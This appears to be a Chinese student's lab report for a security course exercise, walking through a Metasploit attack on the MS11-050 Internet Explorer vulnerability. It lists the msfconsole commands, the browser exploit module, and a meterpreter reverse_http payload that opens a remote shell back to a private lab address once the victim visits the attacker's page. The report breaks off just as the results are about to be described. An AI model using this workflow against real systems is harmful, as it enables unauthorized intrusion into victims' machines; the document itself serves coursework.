20145333茹翔 Exp5 MS11_050
实验过程
使用命令
msfconsole
命令进入控制台使用命令
search ms11_050
查看针对MS11_050漏洞的攻击模块确定相应模块名之后,我们使用该模块。使用命令
use exploit/windows/browser/ms11_050_mshtml_cobjectelement
进入模块使用命令
info
查看该模块的具体信息设置paylaods,我们选择了windows/meterpreter/reverse_http该payload会返回一个遵循http协议的shell,我们以此来获得目标主机系统权限。使用命令
set payloads windows/meterpreter/reverse_http
使用
show options
查看具体参数设置-
设置其相关参数
set LHOST 192.168.31.177
set LPORT 5333
set URIPATH 20145333RX 使用命令
exploit
攻击,等待连接,漏洞主机访问该ip,被攻击主机打开病毒网址效果为: